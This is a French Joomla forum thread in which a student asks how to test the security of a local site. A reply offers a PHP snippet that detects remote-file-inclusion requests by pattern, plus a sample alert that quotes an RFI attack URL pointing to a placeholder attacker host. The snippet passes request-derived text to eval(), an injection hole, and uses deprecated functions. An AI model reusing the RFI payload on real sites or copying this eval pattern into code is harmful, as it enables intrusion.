Joomladay francophone 2018 à Paris 18 et 19 mai

Demande d'aide pour hack et sécurité

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Demande d'aide pour hack et sécurité

    Bonjour à tous,

    Ceci est mon premier post, je me présente donc vite en deux mots, j'habite en Suisse dans la région Lausannoise, j'ai 18ans et je suis étudiant en dernière année à l'ETML (école des métiers de Lausanne) en informatique.

    Dans le cadre de notre formation, nous avons un projet sur joomla, moi ainsi qu'un collègue nous occupons de la partie sécurité, nous avons déjà recueilli pas mal d'information à ce sujet.

    Maintenant, nous voudrions tester les différentes manières de sécuriser un site joomla (qui est déjà en place) mais nous ne savons pas comment faire pour tenter de "hacker" le site (pour infos, nous avons deux PC relié ensemble par câble réseau, sur un des PC se trouve joomla (avec EasyPHP 2.0b1) et l'autre nous servirait "d'attanquant").

    Si quelqu'un pourrait nous indiquer, par MP ou mail, quelques méthodes simples ainsi que quelques conseils pour la sécurité de joomla ce serait avec plaisir.

    En vous remerciant d'avance!

    Salutations!

    Dan

  • #2
    Un petit UP svp! On doit rendre notre rapport pour la fin de la semaine!

    Quelques petites infos techniques :

    Joomla! 1.0.13 Stable [ Sunglow ] 21 July 2007 16:00 UTC

    Aucune extension

    Hebergé en local sous EasyPHP 1.8 ou 2.0b1

    Merci bien!

    Salutations!

    Dan

    Commentaire


    • #3
      fait j'ai failli répondre hier
      puis je me suis trouver bête devant cette question qui est un peu 'comment puis je pirater mon site joomla'
      en fait soit le "pirate" est un pauvre "cracker" qui utilise une faille et du code (et dans ce cas tu trouve cela dans les site "spécialisé)trouvé par un vrai hacker .
      Soit tu as un vrai hacker qui va trouver une faille qui n'etait pas connue et daans ce cas ,generalement...... cela peut du degat en attendant une MAJ.
      l'objectif de ce stage est d'être "responsable de la sécurité , a mon avis la recherche que tu dois mener part "a l'envers" .
      a moins de trouver toi même une faille et de trouver le correctif tu n'ajouteras rien de plus en sécurité que ce qui existe puisque lorsque qu'un faille est détectée une mise à jour est mise en place.
      donc dans ton exposé tu peut parler de l'attitude a avoir face a la maintenance d'un site Joomla! exemple:
      _utilisation de la derniere version (et expliquer ce qu'est une MAJ de securité
      _le travail de la verification régulière de joomla et composant
      _vérifier le status d'un composant avant de l'installer (expliquer que là il peut y avoir un confilt d'objectif avec le concepteur du site qui veux absolument utiliser le super composant que tu sais être plein de faille
      _tu peux faire un descriptif d'anciennes failles trouvée et les solution qui ont été mise en place pour les coriger
      compare par exemple une version 1.0.0 a la version 1.0.3
      _accessoirement tu peut tester en live le script http://forum.joomla.fr/showthread.php?t=41363&page=14
      a condition que easy php ai une fonctionalié mail (il me semble que oui)
      _ expliquer quelques partie du code joomla et des fonctions securité par exemple
      defined( '_VALID_MOS' ) or die( 'Restricted access' );
      a quoi ca sert
      ....... ou le cryptage des mot de passe pourquoi???

      et la tu as le post de moogly
      http://forum.joomla.fr/showthread.php?t=41363
      qui te mache le boulot
      en tout cas bon courage pour ce stage
      Alzeihmer .........de bonne heure
      je sais faire le café et le thé.................

      Commentaire


      • #4
        Envoyé par claudeee Voir le message
        et la tu as le post de moogly
        http://forum.joomla.fr/showthread.php?t=41363
        qui te mache le boulot
        en tout cas bon courage pour ce stage
        Ou bien comme l'a suggéré opware2000 et Sirius, tu peut mettre directement et au début des fichiers index.php et index2.php de la racine de ton site ce bout de code :

        après

        Code PHP:
        define'_VALID_MOS'); 
        tu rajoute

        Code PHP:
        // ************* 
        if (
        ereg('gif\?cmd',$_SERVER['REQUEST_URI']) ||
        ereg('gif&cmd',$_SERVER['REQUEST_URI']) ||
        ereg('jpg\?cmd',$_SERVER['REQUEST_URI']) ||
        ereg('jpg&cmd',$_SERVER['REQUEST_URI']) ||
        ereg('txt\?cmd',$_SERVER['REQUEST_URI']) ||
        ereg('txt&cmd',$_SERVER['REQUEST_URI']) ||
        ereg('txt\?',$_SERVER['REQUEST_URI'])
        )
        {
        $mail_perso "[B]ton_mail@perso.com[/B]";
        $mailheaders .= "From: ".$mail_perso "\r\n";
        // $mailheaders .= "Bcc: ".$mail_perso. "\r\n"; // pour copie cachée

        $msg "Une tentative de hacking commise sur ".$_SERVER['HTTP_HOST']." par ".$_SERVER['REMOTE_ADDR']." en appelant ".$_SERVER['REQUEST_URI']."\n\n";

        $msg .= "HTTP_SERVER_VARS:\n\n";
        $msg .= "HTTP_HOST_NAME => ".gethostbyaddr($_SERVER['REMOTE_ADDR'])."\n\n";
        while (list (
        $key$val) = each ($_SERVER)) $msg .= "$key => $val\n";
        $msg addslashes($msg);
        eval(
        "\$msg = \"$msg\";");
        $msg stripslashes($msg);

        @
        mail($mail_perso,'HACKING TENTATIVE '.$_SERVER['REMOTE_ADDR'],$msg,$mailheaders);
        $iphack "http://www.who.is/whois-ip/ip-address/".$_SERVER['REMOTE_ADDR']."";
        die(
        '<html><head><title>Stop Hacking</title></head><body style=margin:0px;><div align="center" style="background-color:#CCCC33;"><br /><br /><font size="+6"><b>Stop hacking!</b></font><br /><br /><img src="[B][url]http://www.ton_site.com[/url][/B]/[B]ton_image_déstiné_au_hacker.gif[/B]" border="0"><br /><br /><br /><br /><iframe width=100% height=300 frameborder=0 src="'.$iphack.'"></iframe></div></body></html>');
        }
        // ************* 
        Ce script bloque l'attaque, ton site ne bouge pas ! le hacker est renvoyé à cette adresse http://www.ton_site.com/ton_image_déstiné_au_hacker.gif (ou bien tu peut le renvoyer sur la page de google.

        Tu reçois un mail ... (de temps en temps tu le reçoit dans le courier indésirable)

        Code:
        Le titre HACKING TENTATIVE xxx.xxx.xxx.xxx <= numéro d'IP
        
        Une tentative de hacking commise sur ton_site.com par xxx.xxx.xxx.xxx en appelant /index.php/component/option,com_facileforms/Itemid,36//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.lesite_hacker.com/userimages/id.txt?
        
        HTTP_SERVER_VARS:
        
        HTTP_HOST_NAME => 
        
        ....
        N'oublie pas de mettre ton fichier configuration.php en CHMOD 444 (non modifiable)

        Bon courage

        Pierre
        Dernière édition par Peter_P à 30/10/2007, 11h01

        Commentaire


        • #5
          ETML_Dan, peut tu renvoyer ton MP, ma boite était pleine, je ne l'ai pas reçu

          @+

          Pierre

          Commentaire


          • #6
            Envoyé par Peter_P Voir le message
            ETML_Dan, peut tu renvoyer ton MP, ma boite était pleine, je ne l'ai pas reçu

            @+

            Pierre
            C'est fait!

            Sinon, merci pour votre aide à vous deux!

            Nous allons mettre en place quelques sites sous Joomla! pour tester laquel serait la plus pratique et la moins contraignante, mais nous cherchons toujours comment faire pour tenter d'acceder au fichier, etc.. On continue nos recherche!

            Si quelqu'un d'autre à des informations sur la sécurité, merci bien de nous les communiquer!

            Sur ce, bonne fin d'après-midi à toutes et à tous!

            Ciao

            Commentaire

            Annonce

            Réduire
            1 sur 2 < >

            C'est [Réglé] et on n'en parle plus ?

            A quoi ça sert ?
            La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

            Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

            Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
            Comment ajouter la mention [Réglé] à votre discussion ?
            1 - Aller sur votre discussion et éditer votre premier message :


            2 - Cliquer sur la liste déroulante Préfixe.

            3 - Choisir le préfixe [Réglé].


            4 - Et voilà… votre discussion est désormais identifiée comme réglée.

            2 sur 2 < >

            Assistance au forum - Outil de publication d'infos de votre site

            Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

            Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

            Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

            UTILISER À VOS PROPRES RISQUES :
            L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

            Problèmes connus :
            FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

            Installation :

            1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

            Archive zip : https://github.com/AFUJ/FPA/zipball/master

            2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

            3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

            4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

            5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

            6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
            et remplacer www. votresite .com par votre nom de domaine


            Exemples:
            Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/
            Pour executer le script: http://www..com/fpa-fr.php

            Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/cms/
            Pour executer le script: http://www..com/cms/fpa-fr.php

            En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

            Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
            Voir plus
            Voir moins
            Travaille ...
            X